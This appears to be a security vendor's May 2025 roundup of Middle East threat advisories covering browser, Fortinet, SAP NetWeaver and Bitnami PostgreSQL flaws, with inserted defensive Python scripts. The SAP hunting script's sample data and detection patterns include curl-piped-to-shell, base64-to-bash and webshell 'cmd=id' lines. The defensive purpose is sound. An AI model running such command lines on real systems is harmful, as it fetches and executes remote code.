Threat advisories

Top Middle East Cyber Threats – May 20th, 2025  

At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.  

Firefox Encounters Critical Zero-Day Vulnerabilities in JavaScript Engine 

Mozilla Firefox was affected by two critical zero-day vulnerabilities — CVE-2025-4918 and CVE-2025-4919 — discovered in its JavaScript engine. Attackers could exploit these flaws through maliciously crafted websites, potentially leading to arbitrary code execution. The vulnerabilities were demonstrated at Pwn2Own 2025 and have been assigned a CVSS v3.1 score of 8.8 (High). Affected versions include Firefox earlier than 138.0.4, Firefox ESR earlier than 128.10.1, and Firefox ESR earlier than 115.23.1.

RECOMMENDATIONS     

  • Update Firefox to version 138.0.4 or higher. 
  • Update Firefox ESR to 128.10.1 or 115.23.1, depending on deployment. 
  • Monitor web traffic for signs of exploit attempts. 
  • Educate users on phishing and browser security. 

Microsoft Addresses High-Severity Vulnerability in Defender for Linux 

Microsoft released one security fix classified as High in severity. 

The update addresses CVE-2025-47161, a High-severity elevation of privilege vulnerability in Microsoft Defender for Endpoint for Linux.

RECOMMENDATIONS     

  • Ensure all systems are patched and updated.    

Google Chrome Patches Critical Zero-Day Vulnerabilities 

CVE-2025-4664 is a high-severity vulnerability in Google Chrome, caused by insufficient policy enforcement in the Loader component. It allows attackers to bypass Chrome’s sandbox, enabling unauthorized code execution or cross-origin data leakage via specially crafted HTML content. This vulnerability has been exploited in the wild as a zero-day. 

It has been patched in Chrome version 136.0.7103.113/.114 (Windows/Mac) and 136.0.7103.113 (Linux). Android users received the fix in version 136.0.7103.125. 

Google acknowledged the exploit activity but withheld specific technical details to prevent further abuse. A separate high-severity vulnerability, CVE-2025-4609, affecting Mojo (Chrome’s IPC layer), was also patched, though it has not been reported as exploited. 

RECOMMENDATIONS     

  • Ensure all systems are patched and updated.    
  • Avoid clicking unknown or suspicious links that may serve crafted HTML content. 
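A practical follow-up to the Firefox and Chrome recommendations above is an inventory check that flags browser builds older than the fixed releases. The script below is an added example, not part of the advisory or of any vendor tooling: the fixed version numbers are taken from the advisory text, the branch rule (115.x and 128.x treated as Firefox ESR, everything else as rapid release) is an assumption made for this example, and the host inventory is constructed sample data.

```python
"""Flag browser installs that predate the fixed builds named in the Firefox
and Chrome advisories.  Added example: fixed versions come from the advisory
text, the host inventory below is constructed sample data."""
import re

# Firefox fixed builds, keyed by branch.  115.x and 128.x are the ESR lines
# named in the advisory; any other major version is treated as rapid release
# (assumption for this example).
FIREFOX_FIXED = {
    115: (115, 23, 1),
    128: (128, 10, 1),
    "release": (138, 0, 4),
}

# Chrome fixed builds.  Desktop floor is 136.0.7103.113 (the .114 Windows/Mac
# build is also fixed); Android received the fix in 136.0.7103.125.
CHROME_FIXED = {
    "windows": (136, 0, 7103, 113),
    "mac": (136, 0, 7103, 113),
    "linux": (136, 0, 7103, 113),
    "android": (136, 0, 7103, 125),
}


def parse_version(version: str) -> tuple:
    """'138.0.4' -> (138, 0, 4).  Non-numeric suffixes such as 'esr' are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", version))


def firefox_needs_update(version: str) -> bool:
    """True when the build is older than the fixed build for its branch.
    A truncated version such as '138' compares lower than (138, 0, 4) and is
    flagged: the conservative outcome for an unknown patch level."""
    v = parse_version(version)
    if not v:
        raise ValueError(f"unparsable Firefox version: {version!r}")
    branch = v[0] if v[0] in FIREFOX_FIXED else "release"
    return v < FIREFOX_FIXED[branch]


def chrome_needs_update(version: str, platform: str) -> bool:
    """True when the build is older than the fixed build for the platform."""
    fixed = CHROME_FIXED.get(platform.lower())
    if fixed is None:
        raise ValueError(f"unknown Chrome platform: {platform!r}")
    return parse_version(version) < fixed


# Constructed sample inventory: (host, product, version, platform).
INVENTORY = [
    ("ws-01", "firefox", "138.0.3", "windows"),
    ("ws-02", "firefox", "138.0.4", "windows"),
    ("ws-03", "firefox", "137.0.2", "linux"),
    ("srv-04", "firefox", "128.9.0esr", "linux"),
    ("srv-05", "firefox", "128.10.1esr", "linux"),
    ("srv-06", "firefox", "115.23.1esr", "linux"),
    ("ws-07", "chrome", "136.0.7103.92", "windows"),
    ("ws-08", "chrome", "136.0.7103.114", "mac"),
    ("mob-09", "chrome", "136.0.7103.113", "android"),
    ("srv-10", "edge", "136.0.3240.64", "windows"),  # not covered, skipped
]


def find_unpatched(inventory) -> list:
    """Return the hosts whose browser build predates the fixed release."""
    unpatched = []
    for host, product, version, platform in inventory:
        if product == "firefox":
            outdated = firefox_needs_update(version)
        elif product == "chrome":
            outdated = chrome_needs_update(version, platform)
        else:
            continue
        if outdated:
            unpatched.append(host)
    return unpatched


if __name__ == "__main__":
    for host in find_unpatched(INVENTORY):
        print(f"{host}: browser predates the fixed build, update required")
```

Version tuples compare element by element, so a three-part Firefox version and a four-part Chrome version each compare correctly against their own fixed build; feed the function the version strings your endpoint management tool already reports.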

Fortinet Fixes Critical CVE-2025-32756 Zero-Day RCE Flaw in FortiVoice and Related Products 

Fortinet patched a critical security flaw that has been exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems. 

The vulnerability, tracked as CVE-2025-32756, carries a CVSS score of 9.6 out of 10.0. 

This stack-based buffer overflow vulnerability (CWE-121) affects FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. It may allow a remote, unauthenticated attacker to execute arbitrary code or commands via crafted HTTP requests. 

RECOMMENDATIONS     

  • Users of FortiVoice, FortiMail, FortiNDR, FortiRecorder and FortiCamera are recommended to apply the necessary fixes to secure their devices from active exploitation attempts. If immediate patching is not an option, it’s advised to disable the HTTP/HTTPS administrative interface as a temporary workaround. 
  • Monitor and block IoCs 

State-Linked Threat Actors Exploit SAP NetWeaver to Target Critical Infrastructures 

APT groups have launched widespread exploitation campaigns against SAP NetWeaver Visual Composer systems, leveraging CVE-2025-31324, an unauthenticated RCE file upload vulnerability. These campaigns targeted critical infrastructure entities across North America, Europe, and the Middle East. Threat actors deployed multiple malware strains, webshells, and loader frameworks to maintain persistence and facilitate espionage, system discovery, and lateral movement. 

Observed Malware and Tools: 

  • coreasp.js – Encrypted webshell resembling Behinder v3 (AES encrypted, in-memory persistence). 
  • forwardsap.jsp – Simple unauthenticated fallback webshell for command execution. 
  • KrustyLoader – Rust-based loader used to deliver Sliver C2 payloads. 
  • SNOWLIGHT – Loader for in-memory deployment of second-stage implants. 
  • VShell – Remote Access Trojan executed under kernel thread masquerade. 
  • GOREVERSE – SSH-based RAT. 
  • Nuclei – Reconnaissance tool used to scan for vulnerable SAP NetWeaver hosts. 

RECOMMENDATIONS     

  • Apply the SAP patch for CVE-2025-31324. 
  • Restrict access to sensitive endpoints using a Web Application Firewall (WAF) or firewall. 
  • Monitor for unauthorized .jsp uploads under SAP Visual Composer directories. 
  • Use Endpoint Detection and Response (EDR) tools to flag Base64 decoding executed via Bash or one-liner curl/wget commands. 
  • Monitor and block the list of shared IoCs. 
  • Block unauthenticated access to Visual Composer endpoints. 
  • Hunt for hits to /irj/*.jsp?cmd= to detect active webshell exploitation. 
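The last three recommendations describe hunting queries rather than patches. The script below is an added example, not part of the advisory or of the EclecticIQ research it summarises: it scans web server access log lines for the /irj/*.jsp?cmd= pattern and for the webshell file names listed above, and scans endpoint process command lines for Base64 decoding or curl/wget downloads piped into a shell. The log lines and process events are constructed sample data, and the combined-log regex assumes the common Apache/Nginx access log layout.

```python
"""Hunt for the SAP NetWeaver webshell and loader traces listed in the
advisory.  Added example; all log lines and process events are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Webshell file names taken from the advisory text.
KNOWN_WEBSHELLS = {"coreasp.js", "forwardsap.jsp"}

# Common access log layout (assumption): ip ident user [ts] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Process command line patterns matching the EDR recommendation: Base64 decode
# or a curl/wget download whose output is piped straight into sh/bash.
SUSPICIOUS_CMD = [
    ("base64 decode piped to shell", re.compile(r"base64\s+(?:-d|--decode)\b[^|]*\|\s*(?:ba)?sh\b")),
    ("curl/wget download piped to shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")),
]

# Constructed sample access log (documentation IP ranges).
ACCESS_LOG = """\
203.0.113.7 - - [12/May/2025:10:14:02 +0400] "GET /irj/portal HTTP/1.1" 200 5123
203.0.113.7 - - [12/May/2025:10:14:09 +0400] "GET /irj/forwardsap.jsp?cmd=id HTTP/1.1" 200 87
198.51.100.3 - - [12/May/2025:10:15:30 +0400] "POST /irj/coreasp.js HTTP/1.1" 200 412
10.0.0.5 - - [12/May/2025:10:16:00 +0400] "GET /irj/portal/help.jsp?topic=2 HTTP/1.1" 200 2200
this line is not an access log entry and is skipped
"""

# Constructed sample EDR telemetry: (host, parent process, command line).
PROCESS_EVENTS = [
    ("sap-app-01", "java", "sh -c 'echo aGVsbG8gd29ybGQ= | base64 -d | bash'"),
    ("sap-app-01", "java", "sh -c 'curl -s http://198.51.100.3/x | sh'"),
    ("sap-app-02", "sshd", "bash -lc 'base64 -d /tmp/cfg.b64 > /opt/sap/cfg'"),  # decode, not executed
    ("sap-app-02", "cron", "/usr/bin/wget -q https://updates.example.test/pkg.tgz -O /tmp/pkg.tgz"),
]


def scan_access_log(text: str) -> list:
    """Return (ip, reason, path, cmd) for requests that look like webshell use."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        parts = urlsplit(m["path"])
        name = parts.path.rsplit("/", 1)[-1]
        query = parse_qs(parts.query)
        if parts.path.startswith("/irj/") and parts.path.endswith(".jsp") and "cmd" in query:
            hits.append((m["ip"], "webshell command execution", parts.path, query["cmd"][0]))
        elif name in KNOWN_WEBSHELLS:
            hits.append((m["ip"], "known webshell name", parts.path, ""))
    return hits


def scan_process_events(events) -> list:
    """Return (host, parent, label) for command lines matching a suspicious pattern."""
    hits = []
    for host, parent, cmdline in events:
        for label, pattern in SUSPICIOUS_CMD:
            if pattern.search(cmdline):
                hits.append((host, parent, label))
                break  # one label per event is enough for triage
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(ACCESS_LOG):
        print("web:", hit)
    for hit in scan_process_events(PROCESS_EVENTS):
        print("edr:", hit)
```

The URL is parsed rather than string-matched so that the cmd parameter is found regardless of its position in the query string, and the process-line patterns only fire when the decoded or downloaded content is actually piped into a shell, which keeps legitimate base64 file conversions and package downloads out of the hit list.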

Fortinet Releases Update Addressing Multiple High-Severity Vulnerabilities  

Fortinet released a security update to address multiple vulnerabilities in several products, including FortiClient for Mac, FortiClient for Windows, FortiAnalyzer, FortiManager, FortiPortal, and FortiOS. 

The update addresses seven CVEs, categorized as 2 High, 2 Medium, and 3 Low in severity. 

[High] CVE-2025-25251: An incorrect authorization vulnerability in FortiClient for Mac may allow a local attacker to escalate privileges via crafted XPC messages. 

[High] CVE-2023-42788: An improper neutralization of special elements used in an OS command (‘OS Command Injection’) vulnerability in FortiManager, FortiAnalyzer, and FortiAnalyzer-BigData may allow a local attacker with low privileges to execute unauthorized code via specially crafted arguments to a CLI command. 

RECOMMENDATIONS     

  • Ensure all systems are patched and updated.    

VMware Releases Security Update for Bitnami PostgreSQL Access Flaw 

VMware has released one critical security fix addressing CVE-2025-22248 in Bitnami.

The Bitnami/pgpool Docker image and the Bitnami/postgres-ha Kubernetes Helm chart, when deployed with default configurations, include a repmgr user that may allow unauthenticated access to the PostgreSQL database within the cluster. The PGPOOL_SR_CHECK_USER environment variable, typically set to repmgr, is used by Pgpool for performing streaming replication checks. If the associated authentication method is misconfigured (e.g., set to trust), this user can log in without a password. This creates a significant security risk—particularly if Pgpool is exposed externally—as it may allow an attacker to gain unauthorized access to the PostgreSQL service. The issue affects both the Docker image and the Helm chart, and it is recommended to audit authentication settings, restrict external access, and ensure proper access controls are in place. 
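The advisory's advice to audit authentication settings can be automated against the pg_hba.conf or pool_hba.conf rule set the cluster actually uses. The script below is an added example, not part of the Bitnami advisory or of the Pgpool or PostgreSQL projects: it parses rules in the common host-based-authentication layout, flags every rule using the trust method, and rates highest any trust rule that covers the PGPOOL_SR_CHECK_USER account and is reachable from a non-loopback network. The two rule sets are constructed, the default user name repmgr is taken from the advisory, and the parser assumes CIDR-style address fields.

```python
"""Audit pg_hba.conf / pool_hba.conf style rules for password-less ("trust")
access, with special attention to the replication-check user that Pgpool
reads from PGPOOL_SR_CHECK_USER.  Added example; rule sets are constructed."""
import ipaddress
import os

# The advisory names repmgr as the typical value of PGPOOL_SR_CHECK_USER.
SR_CHECK_USER = os.environ.get("PGPOOL_SR_CHECK_USER", "repmgr")

# Constructed rule set resembling a permissive default deployment.
WEAK_HBA = """\
# type  database  user        address        method
local   all       all                        trust
host    all       repmgr      0.0.0.0/0      trust
host    all       all         127.0.0.1/32   trust
host    all       monitoring  10.0.0.0/8     trust
host    all       all         10.0.0.0/8     md5
"""

# Constructed rule set after hardening: passwords everywhere, narrow networks.
HARDENED_HBA = """\
local   all       all                        scram-sha-256
host    all       repmgr      10.42.0.0/16   scram-sha-256
host    all       all         10.0.0.0/8     scram-sha-256
"""


def parse_hba(text: str) -> list:
    """Parse 'local' and 'host*' rules.  Address fields are assumed to be CIDR
    or the keywords all/samehost/samenet (the 'IP netmask' form is not handled)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        if f[0] == "local" and len(f) >= 4:
            rules.append({"type": "local", "db": f[1], "user": f[2], "addr": None, "method": f[3]})
        elif f[0] in ("host", "hostssl", "hostnossl") and len(f) >= 5:
            rules.append({"type": f[0], "db": f[1], "user": f[2], "addr": f[3], "method": f[4]})
    return rules


def reachable_from_network(addr) -> bool:
    """True when the rule can match a client that is not on the local host."""
    if addr is None or addr == "samehost":
        return False  # unix socket or explicit same-host rule
    if addr in ("all", "samenet"):
        return True
    try:
        return not ipaddress.ip_network(addr, strict=False).is_loopback
    except ValueError:
        return True  # host name: assume it can resolve to a remote client


def audit_hba(text: str, sr_check_user: str) -> list:
    """Return one finding per trust rule, rated by whether it covers the
    replication-check user and whether it is reachable over the network."""
    findings = []
    for r in parse_hba(text):
        if r["method"] != "trust":
            continue
        users = r["user"].split(",")
        covers_sr_user = "all" in users or sr_check_user in users
        remote = reachable_from_network(r["addr"])
        if covers_sr_user and remote:
            severity = "critical"  # password-less login for the repmgr-style user from the network
        elif covers_sr_user:
            severity = "high"      # still password-less, but only from the host itself
        else:
            severity = "medium"
        findings.append({
            "severity": severity,
            "user": r["user"],
            "addr": r["addr"] or "unix socket",
            "covers_sr_user": covers_sr_user,
            "remote": remote,
        })
    return findings


if __name__ == "__main__":
    for finding in audit_hba(WEAK_HBA, SR_CHECK_USER):
        print(f"[{finding['severity']}] trust rule for {finding['user']} from {finding['addr']}")
    print("hardened findings:", audit_hba(HARDENED_HBA, SR_CHECK_USER))
```

Run it against the file mounted into the pgpool container (or rendered by the Helm chart) with PGPOOL_SR_CHECK_USER set as it is in the deployment; any critical finding means the replication-check account can log in without a password from wherever Pgpool is reachable, which is the exposure the advisory describes.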

RECOMMENDATIONS     

  • Ensure all systems are patched and updated.    

References 

https://cybersecuritynews.com/firefox-0-day-vulnerabilities/ 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161 

https://cybersecuritynews.com/google-chrome-0-day-vulnerability/, https://chromereleases.googleblog[.]com/2025/05/stable-channel-update-for-desktop_14.html 

https://fortiguard.fortinet.com/psirt/FG-IR-25-254 

https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures 

https://fortiguard.fortinet.com/psirt?filter=1&version=&date=2025 

https://github.com/bitnami/charts/security/advisories/GHSA-mx38-x658-5fwj 
